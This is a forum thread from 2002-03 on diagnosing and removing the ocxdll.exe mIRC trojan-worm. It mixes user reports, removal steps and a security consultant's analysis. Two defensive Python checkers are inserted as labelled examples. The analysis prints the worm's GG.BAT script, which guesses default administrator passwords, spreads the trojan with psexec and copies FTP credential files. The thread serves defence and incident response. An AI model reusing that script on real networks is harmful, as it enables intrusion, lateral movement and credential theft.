There were more people talking about AdobeS.exe so I took a quick look at it (from a file someone sent to me), but didn't run this EXE on my test system. In the hex editor, I noticed a section of strings below. I can't be 100% sure exactly what it does, but based on the binary code, it "might" download and hide porn stuff on the compromised system. It is written in VB 5 or VB 6.

If you have the original AdobeS and AdobeA.exe, please send it to me at kyle@kylelai.com. I just want to verify the contents from different sources.

Thanks,
/Kyle

Kyle Lai, CISSP, CISA
www.kylelai.com
kyle@kylelai.com

Here is the section of strings in the AdobeS.exe:
--
HideMyPornoExe
`g:
`g:
HideMyPorno
HideMyPorno
Form1
`g:
VB5!
cold
HideMyPornoExe
HideMyPornoExe
, @
`g:
HideMyPorno
HideMyPornoExe
`g:
`g:
`g:
`g:
Form
+3q
C:\Program Files\Microsoft Visual Studio\VB98\VB6.OLB
`]_
VBA6.DLL
--

Mitch D

12/18/02
Looks like I've got the dreaded OCXDLL.EXE trojan. McAfee can detect what it reads as 7 "viruses" yet of course it can't delete them (well, it says that it has deleted them, but I can re-scan straight away and they'll be back again).

Finding this thread has been a miracle for me. I searched for several of the files that Kyle initially listed above and found each one that I searched for - kill, ocxdll, dll16 etc

My big question is, I really don't have the confidence to go into my system to make all the changes that it seems I must do in order to rid my system of this scourge. I will have a professional come over to help, but in the meantime I would certainly like to at least delete the known trojan files that I'm locating. If I were to simply delete the files (effectively, performing only step #1 out of 6 steps), will I be doing any good? Or worse, will I end up damaging my system? I'm sorry if the question seems naive. Any input would be greatly, greatly appreciated.

Mitch

Kyle Lai
klai@klcconsulting.net
12/19/02
Hi Mitch,

First of all, please let me know what operating system you are using.

If you have Windows 2000, then ignore the XP system restore instructions.

If you do have XP, disable the "system recovery" mode, do the virus scan, then reboot your system, and re-enable the automatic recovery. The instruction for disabling system recovery is on the Symantec website:
http://service1.symantec.com/SUPPORT/tsgeninfo.nsf/7e7f15291a25d938882567e50048a048/5065b3834b10031488256b0900255ea7?OpenDocument

Let's do the following things. (Both Win 2000 and XP)

1. Make sure you have the latest virus definition from McAfee. If you haven't done so, do that and scan again.
2. Make sure you download swat-it from www.lockdowncorp.com and do the scan on your system. This is free anti-Trojan software. Scan your computer and it should remove a lot of Trojan files that got left behind by McAfee.
3. Change all of your administrator passwords and all passwords on the system, and change your password on your web mail and web accounts; also, watch out for your credit card for the next couple weeks or couple months and make sure the numbers are not stolen. If you don't shop online, this is not an issue. Some online stores store the credit card info on your system (cookies).
4. Download zone alarm from zonealarm.com. It is a free personal firewall.

If you have XP system, make sure you follow Symantec's instruction on the system recovery mode before you start removing the viruses.

If you are interested in reading the whole analysis on the ocxdll.exe virus, you can read my article published at Astalavista.com. The link is at my website, www.klcconsulting.net

Hope this helps. Happy Holidays!
/Kyle
Kyle Lai, CISSP, CISA
KLC Consulting, Inc.
www.klcconsulting.net

Kyle Lai
klai@klcconsulting.net
12/19/02
There is another virus/trojan/worm on the surface.
It was called Lioten, a.k.a. Iraq_oil (iraq_oil.exe). It is similar to the ocxdll.exe / taskmngr.exe. It is also using port 445 (SMB over TCP/IP), which only exists on Windows 2000 and XP.

This trojan also guessed administrator and user id and passwords like ocxdll.exe / taskmngr.exe.

I have not yet analyzed the Lioten trojan so I am not sure if it is associated with ocxdll.exe in any way. Stay tuned.

/Kyle
Kyle Lai, CISSP, CISA
KLC Consulting, Inc.
www.klcconsulting.net

Mitch D

12/19/02
Hi Kyle,

Thank you so much for getting back to me. I am using Windows 2000. I update McAfee each week but it just can't seem to delete these files. I installed AVG and it's the same deal - it can detect but it can't delete.

I've been using Norton Firewall for the last few years. I can only imagine that I got infected during a brief time where I disabled the firewall because I was having trouble with a download and thought the program was the cause. In any case, I'm certain that the Trojan has mutilated the Firewall because, while I still get prompts about ActiveX controls etc, the Firewall has not warned me of an "attack" in months, whereas it used to issue these warnings on a daily basis!

I've got Anti-Trojan installed. For some reason, when I tried to download Swat It, something went amiss and the program opens "partially", for lack of a better way of putting it.

Back to the initial question, if I were to simply delete the OCXDLL-related files without doing the other steps, would I be making a terrible mistake or will it at least get rid of these files for good?

Thanks again for your help. You have no idea how much I appreciate this!

Mitch

Mitch D.

12/20/02
Update: I deleted every file I found from your list, but there were several notable ones that I couldn't find with a hard drive search - namely dll32.ini and httpsearch.ini. HOWEVER, McAfee virus scanning detected *both* of these files in the botsetups directory - along with (presumably duplicate) files of OCXDLL.EXE, NT32.INI and a few others. The problem is, there seems to be no way to manually delete these files! When I open the botsetups folder, none of these files appear to be there, yet McAfee consistently indicates that this folder is precisely where they are. Is there a trick I can use to get to these files? I assume that they're being masked somehow.

Mitch

dan

12/20/02
since this is a trojan virus it's best for you to get a firewall, any kind, free or not; just block the IP of people who are trying to connect to your computer through ICMP and TCP and block connections to servers with port 6669
Kyle Lai
klai@klcconsulting.net
12/21/02
Here are 2 things worth mentioning:

1. *** For people having problems deleting some executable files related to this ocxdll.exe Trojan/worm/virus, i.e. winhp32.exe, they were somewhat protected. However, you can probably successfully delete these files by renaming them from the ".exe" extension to ".txt". What a nasty thing they did...

2. mIRC Trojans use standard IRC ports (mostly 66 - 6669) plus other ports, and sometimes they create backdoors in case the victims were blocking the standard IRC ports. In the case of the ocxdll.exe I have seen, it opened a backdoor port, 60609, so blocking IRC ports is just not enough.

In order to guard against this type of worm/virus/Trojan, application level personal firewalls would be my choice. These types of firewalls check each application's specific incoming and outgoing connection attempts, which is the most effective way to protect systems. These types of firewalls will not let unknown incoming or outgoing traffic pass through the system. If unknown connection attempts are detected, these types of firewalls will ask for the user's decision to permit or deny the connections.

For example, if a new virus/worm/Trojan gets into a network of 50 computers where each desktop has an application level personal firewall, this new Trojan/worm might not do as much damage compared to a network without them.

/Kyle
Kyle Lai, CISSP, CISA
KLC Consulting, Inc.
www.klcconsulting.net
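One concrete way to act on Kyle's point that blocking the IRC ports alone is not enough is to look at what the machine is actually listening on and talking to. The following is an added example, not code from Kyle or from anyone in this thread: it parses "netstat -an" style output and flags established sessions to the standard IRC port range (6660-6669, a known fact, not something the thread states) and any local listener on 60609, the backdoor port Kyle reported above. The sample netstat output is constructed for the example.

```python
"""Triage of `netstat -an` output for the IRC and backdoor ports discussed
in this thread. Added example, not code from any poster; the sample
netstat lines below are constructed."""
import re

# Standard IRC port range (6660-6669) plus the 60609 backdoor Kyle reported.
IRC_PORTS = set(range(6660, 6670))
BACKDOOR_PORTS = {60609}

# Constructed sample in Windows `netstat -an` layout (not a real capture).
SAMPLE_NETSTAT = """\
  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:60609          0.0.0.0:0              LISTENING
  TCP    192.168.1.5:1037       10.0.0.7:6667          ESTABLISHED
  TCP    192.168.1.5:1040       10.0.0.9:80            ESTABLISHED
  UDP    0.0.0.0:137            *:*
"""

# One connection line: proto, local addr:port, foreign addr:port, optional state.
LINE_RE = re.compile(
    r"^\s*(?P<proto>TCP|UDP)\s+(?P<laddr>\S+):(?P<lport>\d+)\s+"
    r"(?P<raddr>\S+):(?P<rport>\d+|\*)\s*(?P<state>\S+)?\s*$"
)


def parse_netstat(text):
    """Return one dict per connection line; header and blank lines are skipped."""
    rows = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        row = m.groupdict()
        row["lport"] = int(row["lport"])
        row["rport"] = int(row["rport"]) if row["rport"] != "*" else None
        rows.append(row)
    return rows


def find_suspicious(rows):
    """Return (reason, row) pairs: backdoor listeners and live IRC sessions."""
    hits = []
    for r in rows:
        if r["proto"] != "TCP":
            continue
        if r["state"] == "LISTENING" and r["lport"] in BACKDOOR_PORTS:
            hits.append(("backdoor listener", r))
        elif r["state"] == "ESTABLISHED" and r["rport"] in IRC_PORTS:
            hits.append(("irc session", r))
    return hits


if __name__ == "__main__":
    for reason, row in find_suspicious(parse_netstat(SAMPLE_NETSTAT)):
        print(f"{reason}: local {row['laddr']}:{row['lport']} "
              f"remote {row['raddr']}:{row['rport']}")
```

The port lists are a starting point only: a Trojan can be configured for any port, so a hit is a reason to identify the owning process (Kyle's advice to check file properties applies there too), and a clean result is not proof of a clean machine.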

Tim
thunger@wyndham.com
12/26/02
Hey All! I was pleased to see this discussion about the virus. My computer was very infected. Did anybody notice a bunch of *.eml files on the system? I had about 332 mb worth of these files. The filenames appeared to look like valid email files (very clever), but they were widespread throughout the entire drive: one .eml file in each directory.

I do not know much about viruses, but I am trying to clean things up..

Thanks for your help!
Tim

RG
sumcousa@yahoo.com
12/27/02
Kyle,

Somehow I keep getting the HideMyPornoExe prompt with a run time error message every time I reboot my WIN2K machine. Any suggestions on getting rid of it?

I'm running the current Norton AntiVirus. Dual Pentium III.

Thanks,

RG

Kyle Lai
klai@klcconsulting.net
12/29/02
RG,

HideMyPornoExe is not a pleasant name for a window is it? :)

HideMyPornoExe seems to be the hide window program.

Based on the symptoms you described, it might indicate that your registry still has the registry value inserted by the virus/worm/trojan.

Here is what you should check in the Windows registry:
1. Go to start->run and type "regedit"
2. Go to the following registry keys and identify a string value "Run32dll" with data like "taskmngr.exe", "task32", "ocxdll.exe" or something suspicious.
a. HKey_local_machine\software\microsoft\windows\CurrentVersion\Run
b. HKey_local_machine\software\microsoft\windows\CurrentVersion\RunOnce
c. HKey_local_machine\software\microsoft\windows\CurrentVersion\RunService

3. Once you identified the infected registry value, delete that registry value. ***MAKE SURE YOU SELECT "RUN32DLL" REGISTRY VALUE ON THE RIGHT SIDE OF THE WINDOW. YOU SHOULD ONLY SEE 3 CHOICES WHEN YOU RIGHT CLICK: "MODIFY", "DELETE" AND "RENAME". IF YOU SEE MORE THAN 3 CHOICES, YOU ARE AT THE WRONG PLACE AND DO NOT CLICK "DELETE". IF YOU SEE ONLY 3 CHOICES, THEN RIGHT CLICK AND SELECT "DELETE." ***

That should stop this virus/worm/trojan from starting up each time you reboot your system, which will eventually stop the windows pop-up.

MAKE SURE you change your administrator and all user account passwords, or you will be infected again because the worm/trojan already reported your passwords back to the Trojan owner(s)...

Good luck!
/Kyle
Kyle Lai, CISSP, CISA
KLC Consulting, Inc.
www.klcconsulting.net
You can check

Mike Ranger
rngrmyk@yahoo.com
01/08/03
I am impressed with this thread and all the helpful suggestions, however I have not seen the problem I am having discussed. Of course I am old and getting senile so it might have been covered ;-) Anyways, I believe I have the hide windows virus, my problem is my Windows 2k (build 2195) hangs on the after log in screen. At first I thought my harddrive went bad, but ruled that out when I noticed the screen saver still came on.

My grisoft anti-virus detected the hidewindows and 'healed' it, but upon restarting, it still hangs. I can only ctrl*alt*delete to the Win task manager and manually start the a/v program or others. I have enough knowledge to be 'dangerous' but not enough to figure how to get to a "find" prompt or start the reg-edit type process to delete files or rename suspect files.

Any ideas how I can get my puter back to a regular desktop environment or how I can task manager my way to check my registry for the listed files?

Jean Garcia-Gomez
jeangarcia@yahoo.com
01/09/03
Thanks to all who have contributed to saving our home networks from these viral vandals. Thanks especially to you Kyle. I too am having the same issue as everyone else with regards to the ocxdll.exe trojan worm virus whatever you want to call it. The funny thing is that I keep deleting all the files aforementioned and deleting the registry entries, as well as restoring the security settings, yet it seems to keep recurring on my Win2000 system. The only program I was unable to delete was mdm.exe. I found dll16.nt, dll32.hlp, dll32nt.hlp, gg.bat, kill.exe, mdm.exe, ncp.exe, nt32.ini, psexec.exe, seced.bat, task32.exe, tftp8675, and xvpll.hlp. I did not find gates.txt, httpsearch.ini, mdm.scr, mt.exe, v.exe, or psexec.exe. I have a feeling somewhere on my server the trojan is still "hiding", being activated somehow when my server is turned on, or perhaps a port I opened and a hacker has infected my computer again.

I have downloaded the Anti-Trojan program and will attempt to see if it finds anything that I missed. My Norton Antivirus program failed to detect these files as being viruses. Also, when NAV finally did detect them, it could not quarantine or repair them. If I happen to receive this file again, I will forward it to you Kyle. And I will install a firewall as recommended.

Thanks to you all once again.

Kyle Lai
klai@klcconsulting.net
01/10/03
Thanks for the comments.

Be careful about mdm.exe. It COULD be a legit Windows program. You need to right click on the mdm.exe file you found and check its file properties (right click on the file and go to properties), and click on the version tab to see the information about the file. If the company is Microsoft, the original name is mdm.exe, and the product name is one of Microsoft's products, you might be OK.

As I have mentioned many times, swat-it and ad-aware (you can search the links from my earlier comments) are complementary to the anti-virus software. anti-virus software alone is not enough.

If you can't seem to remove the files, run swat-it and ad-aware and let's see if they help. Most likely they will remove a bunch of "bad" files for you.

Cheers,
/Kyle

Kyle Lai, CISSP, CISA
KLC Consulting, Inc.
http://www.klcconsulting.net

Peter Davis
petermdavis@iprimus.com.au
01/11/03
taskmngr.exe \ tskmgr.exe win xp pro
The file C:\WINDOWS\SYSTEM32\tskmgr.exe is infected with the Backdoor.Sdbot virus.
Unable to delete the file.
I have deleted the file using safe mode and then quarantined it with Norton 2002, then deleted it, and haven't had a problem since. It may be from QuickTime, as I installed one supplied with a manufactured civil engineering package. It is a small server file that uses a port to access the net and allow the perpetrator access. If it's the same one I had you may have had an unusual dialup at the beginning of your Windows startup. If it's a necessary file required by Windows, just extract a new one from the CD; the folder is x:\I386 TASKMGR.EX_
Filip Wtterwulghe
filipw@skynet.be
01/13/03
Hello,

Ever since I had the trojan that was listed here above I can't seem to share my internet connection anymore. I can share directories ... but no Internet Connection. I have done all steps to remove the trojan (see posting of aladin aladin168@hotmail.com 09/05/02) and to reset all user rights as before. But still it doesn't work.

What could it be ?

Hoping to hear from you .

Filip W.

some1

01/16/03
hey, to delete servudamon.ini just type
net stop serv-u
at the DOS command prompt
and then u'll be able to delete it,
btw, can u post ocxdll.exe somewhere? I want to inspect it.
javier leon
javierleon30@hotmail.com
01/17/03
kazaa
I'm trying to find kazaa but in a zipped folder because my laptop doesn't allow setups, so if anyone knows where to get it please contact me at my e-mail.
Lea

01/19/03
I started running netstat to figure out what's sending data across the network when I'm not doing anything. There was always a tcp connection open to t.opless.biz:95?? on some; when I go to the web site it redirects to another site.
After killing netlogn.exe the connection stopped.
I then realised I can't access my registry settings or change my admin password, and I have all the trojan files on my machine:
abc2.dll, adobes.exe and adobea.exe (which I mistook for reader)

I think I'm going to reformat my machine now. I don't see what else I can do

salsa
choi_boy_@hotmail.com
01/19/03
whenever I want to run a program, a message pops up:
"cannot find the file 'file directory' (or one of its components). make sure the path and filename are correct and that all required libraries are available."

THIS MESSAGE POPS up every time I try running a program... winamp, quicktime, msn doesn't work!
and when I try to check properties or other security stuff it will deny the access...
is this related to the mIRC trojan?
because after I got that mIRC trojan worm my computer got hacked and got really screwed up...
I'm thinking of formatting my drive... this REALLY SUCKS

salsa

01/19/03
Lea I have the same problem!
DOES ANYONE KNOW HOW TO SOLVE THIS?!
-or ill just format my drive
Leah

01/20/03
Salsa,
Given that someone probably ran a bunch of commands on my machine which I use heavily, I'm more concerned about identity theft.

I've installed XP now , changed most my passwords and I'm going to check my equifax reports.

I'd really like to know why I had a connection to t.opless.biz [65.116.90.25] when I had made no connections to the internet and I had no known applications running

dcdon

01/20/03
FOUND ABOUT this W O R M
++
SMB over TCP attack, using port 445. It looked for vulnerabilities in
weak administrator IDs and passwords on the local Windows 2000 systems.
++

One of my clients also got infected with the ocxdll.exe virus. This
occurred back on 8/28/2002 at 3am. After some detailed analysis, I
determined that it was a Trojan, deleted the detected registry
entries, deleted the infected files, tightened the administrator ID and
password, restored the security policy by running "secedit.exe
/configure" (from Microsoft) (if they have a backup .sdb file, then just
reapplying the security policy would fix this part), and added users
back to local. The cause is bad security (admin ID and passwords), and
a backdoor to drop the ocxdll.exe.

Affected systems:
++
- Windows 2000. Security policy alteration was ONLY for Windows
2000
- Windows NT - might be infected, but will not distribute or change
security policies.

What did it do?
++
1. Hid all programs it ran.
2. Opened a backdoor, port 60609
3. Ran the mIRC client with random usernames listed in mdm.scr, with
more random characters
4. It ran the bot (robot) scripts in the following order, which means
they contained malicious automated instructions.

[rfiles]
n0=nt32.ini
n1=dll16.ini
n2=nt32.ini
n3=dll32nt.hlp
n4=xvpll.hlp
n5=dll32.hlp
n6=httpsearch.ini.

5. Replaced security policy settings using the Microsoft security
editor (SecEdit.exe /configure) command, reset the security policy to
default settings, and replaced security settings with those in
TFTP8675. This is done in quiet mode.
6. It scans for 20 IPs and then starts running "GG.BAT", which is the
real program that started the hacking.
7. It tries to hack into the system using the following user IDs and
passwords. If you don't have these user IDs and passwords, maybe you
are just infected on 1 system, and it could not spread via this
Trojan/worm.
a. "administrator" with NO password
b. "administrator" with "administrator" password
c. "root" with "root" password
d. "admin" with "admin" password
8. If you have some guessable administrator IDs and passwords, then
probably these systems were hacked successfully. It copied the Trojan
OCXDLL.EXE to the compromised systems. If the file was already there,
it copied it anyway, and did it quietly (using psexec.exe -c -f -d).
9. Ran the OCXDLL.EXE without any delay (psexec.exe -d), which
extracted the 17 files that are in this self-extracting file.
10. It tries to copy "c:\progra~1\flashfxp\sites.dat" and
"c:\progra~1\ws_ftp\ws_ftp.ini" to the "c:\windows\system32" directory.
(maybe to get the configuration from the bot?)
11. Started the "taskmngr.exe", which was really Mirc.EXE, an IRC
client.
12. The scripts kicked in to HIDE the mIRC window, so you can
ONLY see it in the process list. You will see "taskmngr.exe" (NOT
taskmgr.exe, which is the REAL task manager)
13. xvpll.hlp reports Trojan status back to the hacker, either
attempt failed or attempt successful.
++
Disclaimer: The IRC bot scripts have not been fully analyzed. This is
what I understood so far. The removal instructions WILL remove the
trojan.
++

Impact:
++
This may have been a random attack. However, there is a file, ncp.exe,
involved, which is the NetCat program. This program allows the
hackers to gain full control of your system. Therefore,
1. Best-case scenario is that it was a hack, and no sensitive data
was lost.
2. Worst-case scenario is that they have controlled your system and
implemented something new that is not yet detected.
3. The hacker has captured your IP address and knows that you were
vulnerable because the Trojan actually reported back to him/her.
++

How to remove the Trojan:
++
1. Delete files that were extracted from ocxdll.exe, plus ocxdll.exe
and dll16.ini (created when running mirc.exe)

Ocxdll.exe
Dll16.ini
dll32.hlp
dll32NT.hlp
gates.txt
gg.bat (bat file to hack and copy Trojans)
httpsearch.ini (might show up as httpsear.ini due to 8.3 file format)
kill.exe (to kill process)
mdm.exe (to hide window program)
mdm.scr
mt.exe
ncp.exe
NT32.ini
psexec.exe
seced.bat
taskmngr.exe
tftp8675
v.exe
xvpll.hlp

**
**NOTE:
seced.bat is a decoy. This file was never used. The real instruction
for updating the configuration was mentioned in item #5.
v.exe is actually srvany.exe, which is another decoy. It was never
used.

**

2. Hkey local machine\Software\Microsoft\Windows\CurrentVersion\Run,
remove "taskmngr.exe" (this starts the mIRC client program during
Windows startup)
3. Change the LOCAL Administrator password on ALL systems! Make sure
they are strong passwords! Use a mix of uppercase, lowercase, numbers,
and non-alphanumeric characters, i.e. _,+,=,), ...
4. If possible, change the Administrator login ID to a different
user_id. This will stop the initial user_id guessing. (This will not
stop the more sophisticated hackers)
5. Restore the default security policy settings by typing "secedit
/configure /db C:\WINNT\security\Database\secedit.sdb"
6. Go to start -> programs -> administrative tools -> Local Security
Policy, click on "User Rights Assignments", and add users and groups
back into the "Access this computer from the network" policy. The
default setting is:
a. IWAM_[SYSTEM_NAME]
b. ADMINISTRATORS
c. BACKUP OPERATORS
d. POWER USERS
e. USERS
f. EVERYONE
g. IUSR_[ SYSTEM_NAME]

Additional Recommendation:
--
1. Tighten your firewall and deny all unwanted traffic from accessing
ports, BOTH inside to outside, and outside to inside.
2. Rename your administrator user id to something else, and create a
user id called "Administrator" with NO GROUPS. This will allow you to
monitor anyone trying to use the "Administrator" login.
3. Set up a security log, at minimum logging successful and failed
Logon/Logoff, and monitor the event logs.
++

More details:
Infection:
registry entries
- Hkey local machine\Software\Microsoft\Windows\CurrentVersion\Run,
remove "taskmngr.exe" (this starts the mIRC client program during
Windows startup)

When the mIRC client started running, it ran the scripts in dll32nt.hlp,
which in fact ran "secedit /configure /DB secedit.sdb /cfg $mircdir $+
tftp8675 /quiet". This meant "configure your system settings with the
default security policy, plus the additional settings in tftp8675".
It basically removed many security restrictions, removed all audits for
the systems, and of course removed all users from "Local Users
allowed from the net".
List from TFTP8675:
--
MinimumPasswordAge = 0
MaximumPasswordAge = 42
MinimumPasswordLength = 0
PasswordComplexity = 0
PasswordHistorySize = 0
LockoutBadCount = 0
RequireLogonToChangePassword = 0
ClearTextPassword = 0
[Event Audit]
AuditSystemEvents = 0
AuditLogonEvents = 0
AuditObjectAccess = 0
AuditPrivilegeUse = 0
AuditPolicyChange = 0
AuditAccountManage = 0
AuditProcessTracking = 0
AuditDSAccess = 0
AuditAccountLogon = 0
--

OCXDLL.EXE is a self-extracting file that included 17 files. It is a
Trojan and it's a worm. In dll32nt.hlp, it has an instruction to
do an IP scan, and store the 20 IP addresses it found. Most likely it
scanned the subnet and file servers that were connected to the victim
systems at that time. Then it has an instruction at the end to run
GG.BAT, which is the instruction to attack the 20 IPs that were just
found.

Here are the files that were extracted from ocxdll.exe:
++
ocxdll.exe
dll32.hlp
dll32NT.hlp
gates.txt
gg.bat
httpsearch.ini
kill.exe
mdm.exe
mdm.scr
mt.exe
ncp.exe
NT32.ini
psexec.exe
seced.bat
taskmngr.exe
tftp8675
v.exe
xvpll.hlp
++

Here is the GG.BAT text:
--
@echo off
net use /del \\%1\ipc$
net use \\%1\ipc$ "" /user:administrator
net use \\%1\ipc$ "administrator" /user:administrator
net use \\%1\ipc$ "root" /user:root
net use \\%1\ipc$ "admin" /user:admin
psexec \\%1 attrib.exe -r ocxdll.exe
psexec \\%1 -d kill.exe temp.exe
psexec \\%1 -f -c -d ocxdll.exe -o
psexec \\%1 -d ocxdll.exe -o
psexec \\%1 cmd.exe /c copy c:\progra~1\flashfxp\sites.dat
c:\winnt\system32\w%1.dat
psexec \\%1 -d taskmngr.exe
psexec \\%1 cmd.exe /c copy c:\progra~1\ws_ftp\ws_ftp.ini
c:\winnt\system32\w%1.ini
psexec \\%1 -d taskmngr.exe
--

--
from SysInternals, here is the description of what the PSEXEC
parameters do:
-c = Copy the specified program to the remote system for execution. If
you omit this option then the application must be in the system's path
on the remote system.
-f = Copy the specified program to the remote system even if the file
already exists on the remote system.
-d = Don't wait for application to terminate. Only use this option for
non-interactive applications.
--
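The tftp8675 list quoted above is in the INF format that secedit reads, so the same format can be checked before a template is ever applied. The following is an added example, not code from dcdon, Kyle or anyone in this thread: it parses a secedit-style template and reports every password-policy value that falls below a floor and every audit category that is switched off. The sample template is constructed to match the quoted values; the "[System Access]" section header, which the quoted excerpt omits, and the floor values are this example's own assumptions, not something the thread states.

```python
"""Checker for secedit-style security templates, such as the tftp8675
settings dcdon quotes above. Added example, not code from the thread; the
floor values below are this example's own assumptions."""

# Constructed sample in the same INF layout as the quoted list. The
# [System Access] header is assumed (the quoted excerpt did not show it).
SAMPLE_TEMPLATE = """\
[System Access]
MinimumPasswordAge = 0
MaximumPasswordAge = 42
MinimumPasswordLength = 0
PasswordComplexity = 0
PasswordHistorySize = 0
LockoutBadCount = 0
RequireLogonToChangePassword = 0
ClearTextPassword = 0
[Event Audit]
AuditSystemEvents = 0
AuditLogonEvents = 0
AuditObjectAccess = 0
AuditPrivilegeUse = 0
AuditPolicyChange = 0
AuditAccountManage = 0
AuditProcessTracking = 0
AuditDSAccess = 0
AuditAccountLogon = 0
"""

# Assumed floors for the password policy (setting name -> minimum accepted).
PASSWORD_MINIMUMS = {
    "MinimumPasswordLength": 7,
    "PasswordComplexity": 1,
    "PasswordHistorySize": 1,
    "LockoutBadCount": 1,
}
# Audit categories that should not be turned off (0 means no auditing).
AUDIT_REQUIRED = {
    "AuditLogonEvents", "AuditAccountLogon",
    "AuditPolicyChange", "AuditAccountManage",
}


def parse_template(text):
    """Parse [section] / key = value lines into {section: {key: value}}.

    Numeric values become ints; keys seen before any header land in "".
    """
    sections, current = {}, ""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            sections.setdefault(current, {})
            continue
        if "=" in line:
            key, _, value = line.partition("=")
            value = value.strip()
            if value.lstrip("-").isdigit():
                value = int(value)
            sections.setdefault(current, {})[key.strip()] = value
    return sections


def find_weakenings(sections):
    """Return human-readable findings for values below the assumed floors."""
    findings = []
    access = sections.get("System Access", {})
    for key, floor in PASSWORD_MINIMUMS.items():
        if key in access and access[key] < floor:
            findings.append(f"{key}={access[key]} (below {floor})")
    audit = sections.get("Event Audit", {})
    for key in sorted(AUDIT_REQUIRED):
        if audit.get(key) == 0:
            findings.append(f"{key}=0 (auditing disabled)")
    return findings


if __name__ == "__main__":
    for finding in find_weakenings(parse_template(SAMPLE_TEMPLATE)):
        print(finding)
```

Run against the quoted values, every password floor and every required audit category fails, which is the whole effect dcdon describes: the template does not exploit anything by itself, it simply removes the controls (logon auditing included) that would have recorded the password guessing and the later logons.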

swips88

01/20/03
Just struggled through a variant of this virus.
It came in on abcd.jpg.
It was a text file, not an image file, with first line:
"on *:TEXT:*:*:{
I was not aware a jpg could do this?? Is this activated just by viewing in a browser or e-mail?

It altered my registry as follows, with "epgcj.exe" (virus) running on every boot up:

Key Name: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Class Name:
Last Write Time: 12/10/2002 - 11:37 PM
Value 0
Name: epgcj
Type: REG_SZ
Data: epgcj.exe 

Value 1
Name: MSKCES32
Type: REG_SZ
Data: C:\WINNT\msapps\dir\clt.exe

Value 2
Name: Synchronization Manager
Type: REG_SZ
Data: mobsync.exe /logon

Value 3
Name: TkBellExe
Type: REG_SZ
Data: C:\Program Files\Common Files\Real\Update_OB\evntsvc.exe -osboot

Note the date of this bugger:
12/10/2002
I believe QuickTime was also recently installed or updated? This machine had Administrator and no password! The machine also is not re-booted often so I am not sure when it was originally infected. I only located it when I noticed 2 quick DOS screens opening and closing during a recent boot, or log-on. I only figured it out when I logged on without an internet connection present (disabled NIC card); the message on log-on was:
"host not found= stole.no-ip.infoservice"

The actual ip of clone server, found in abcd.jpg file = 216.127.74.108

I searched my system for other files with the same or close dates and found a slew of them which I deleted (and saved copies). They were in WINNT\msapps\dir, and WINNT\system32.

One which was copied by a bat file from \system32 to WINNT\msapps\dir was msappsa.exe

Hope I found most of the mess. Anything further I should do?

Serge Shpichuk

01/21/03
NAV 2003 was installed on my computer AFTER the Internet was installed, so one of my files was infected by IRC.Mimic. When I'm running a scan with NAV from the computer it gets nothing, but when I'm using the scan from the Internet, "Symantec Security Check", it says: "os32.ini is infected with IRC.Mimic." What should I do? "Live Update" doesn't help, nothing else either. Please help me to get rid of it.
Kyle Lai
klai@klcconsulting.net
01/23/03
Wow, this discussion group is getting technical...

Anyway, for part1 and part 2 of the technical analysis on the ocxdll.exe / taskmngr.exe original (not variants) Trojan, check out http://www.klcconsulting.net/mirc_virus_analysis.htm . Part 2 of the analysis gives the instructions to remove that Trojan/Worm/Virus.

People's concern about identity theft is VERY REAL. Some variants I analyzed have the capability of stealing any credit card, password info you saved on your computer. It means, if you ever click "save my password so I don't have to login next time", those passwords might have been stolen.

If you think the damage is bad, save critical files and format it and rebuild it, and do it right this time. It'll help to prevent the next virus/trojan attacks.

Here are the quick 10 steps I can recommend for re-building your system.
1. Backup your critical data
2. Format your system
3. Install Operating System
4. Rename your "Administrator" userID to something like "_admin" or "[name]_admin" (e.g. "kyle_admin"). Make sure you remember that you did this, or write it down.
5. Rename your "Guest" userID to something else, e.g. "guest_user". Write down your changes.
6. Set strong passwords for your administrator account. Use a combination of letters, numbers, and if possible, special characters like "+", "_", "-" in the password to make it even harder to guess. Make the passwords at least 7 characters long.
7. Install the following software (mentioned in 9/24/2002):
7a. Install anti-virus software with the latest definition file. Paid anti-virus software is better. If you don't have one, download a free one, AVG Free Edition. It has update capability too: http://www.grisoft.com

7b. Install Anti-Trojan software on top of the Anti-Virus software. Anti-Virus software does not usually detect Trojans and hacker software that were installed during an intrusion. Paid versions like Pest Patrol are good. If you don't have one, get a free one. It's great and it's Swat-IT by Lockdown Corp: http://lockdowncorp.com/bots/downloadswatit.html

7c. Install Ad-Aware software, which is for removing the advertising software that web advertisers installed on your systems without your knowledge. This happens simply by just surfing the Web... You'll be surprised how many adwares are on your systems. This one is free and available at: http://www.ad-aware.com

7d. Get a personal firewall for your computers. Symantec and McAfee also make personal firewalls and they are effective. If you don't have one, use the FREE firewall software, Zone Alarm. It's available at http://www.zonealarm.com

8. Make sure you have all the software patches up to date. This includes the Operating System, Internet Explorer, Instant Messengers, Anti-virus, Anti-Trojan, Firewall software, etc... Windows 2000 & XP have the "Windows Update" feature, so take advantage of that.

9. If you have cable modem/DSL service, get a Cable Modem/DSL Router, which usually has a built-in firewall. This router will be your first line of defense, and your systems are hiding behind it. If a virus or an intruder starts an attack, your computer will not get hit directly. This adds another layer of defense.

10. If you are a technical person who uses "net stat", use TCPView from Sysinternals. It shows more information and it's easier to track viruses/Trojans. You can get that at http://www.sysinternals.com/ntw2k/source/tcpview.shtml.

If you follow these 10 steps, you should have a better experience this time.

My firm does more commercial forensic, virus analysis and IT security services. If your case is beyond "home computers" and requires special security services, feel free to contact me directly.

Good luck!
/Kyle

Kyle Lai, CISSP, CISA
KLC Consulting, Inc.
http://www.klcconsulting.net

John
jrestrepo@yahoo.com
01/25/03
Thanks for all the help. I was whacked by this also. Is there still a desire for "OCXDLL.EXE" that uses/abuses task32.exe?
John
jrestrepo@yahoo.com
01/25/03
FOLLOW-UP: Never mind about the file (OCXDLL.EXE), I already deleted it.
chris
magpie66_mx@yahoo.com
01/30/03
taskmngr.exe is now winclock.exe
If you've looked for taskmngr and it's not in your reg or anywhere else for that matter, and yet mIRC still starts up when you boot, try looking for winclock.exe as this is also mirc.exe in disguise. If that is not it then it may be constantly changing, so when it boots up run Task Manager and you will see it there; highlight it, right-click it and select "go to process", and there it is!! Then search for the file and it will be in winnt/system32.
Rob
radmin@comcast.net
01/31/03
